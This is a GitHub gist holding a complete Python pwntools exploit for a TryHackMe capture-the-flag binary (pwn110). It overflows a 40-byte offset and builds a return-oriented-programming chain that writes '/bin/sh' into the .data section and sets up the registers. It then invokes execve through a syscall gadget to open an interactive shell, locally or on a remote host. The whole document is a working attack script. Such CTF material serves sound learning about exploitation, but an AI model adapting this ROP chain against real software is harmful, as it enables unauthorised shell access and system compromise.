Skip to content

Instantly share code, notes, and snippets.

@DanaEpp
Last active May 10, 2022 23:43
Show Gist options
  • Save DanaEpp/fdcb1d6030d46be7f0fbc1e539359ed2 to your computer and use it in GitHub Desktop.
Save DanaEpp/fdcb1d6030d46be7f0fbc1e539359ed2 to your computer and use it in GitHub Desktop.
THM PWN 101 - Challenge 10 (optimized using pwntools native ROP() chains)
#!/bin/env python3
import sys
from pwn import *
exe = "./pwn110.pwn110"
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
def start(argv=[], *a, **kw):
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE:
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else:
return process([exe] + argv, *a, **kw)
# Specific your GDB script here for debugging
gdbscript = '''
continue
'''.format(**locals())
offset = 32 + 8 # Adjust for buffer + RBP
log.info( "Building ROP chain..." )
rop = ROP(elf)
data_section = elf.get_section_by_name('.data').header.sh_addr
write_gadget = 0x47bcf5 # mov qword ptr [rsi], rax; ret // Write-What-Where gadget
xor_rax_gadget = 0x443e30 # xor rax, rax; ret
add_rax_gadget = 0x470d20 # add rax, 1; ret
syscall = rop.find_gadget(['syscall']).address # We want a syscall gadget WITHOUT the ret
# ----------------------------------------------------
# | syscall | %rax | %rdi | %rsi | %rdx |
# ----------------------------------------------------
# | SYS_execve | 59 | *filename | *argv[] | *envp[] |
# ----------------------------------------------------
rop.raw(rop.rsi.address) # pop rsi; ret
rop.raw(data_section) # @ .data
rop.raw(rop.rax.address) # pop rax; ret
rop.raw( b'/bin/sh\x00' ) # We make sure the data is properly 8 byte aligned
rop.raw(write_gadget) # mov qword ptr [rsi], rax ; ret // Write-What-Where gadget
rop.raw(rop.rsi.address) # pop rsi; ret
rop.raw(data_section + 8) # @ .data + 8
rop.raw(xor_rax_gadget) # xor rax, rax ; ret
rop.raw(write_gadget) # mov qword ptr [rsi], rax ; ret // Write-What-Where gadget
rop.raw(rop.rdi.address) # pop rdi; ret
rop.raw(data_section) # @ .data
rop.raw(rop.rsi.address) # pop rsi; ret
rop.raw(data_section + 8) # @ .data + 8
rop.raw(rop.rdx.address) # pop rdx; ret
rop.raw(data_section + 8) # @ .data + 8
rop.raw(xor_rax_gadget) # xor rax, rax ; ret
for i in range(0, constants.SYS_execve):
rop.raw(add_rax_gadget) # add rax, 1; ret
rop.raw(syscall)
log.info( "Starting exploit run..." )
p = start()
log.info( "Sending payload..." )
p.sendlineafter( b"without libc \xf0\x9f\x98\x8f", fit({offset:rop.chain()}) )
p.clean()
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment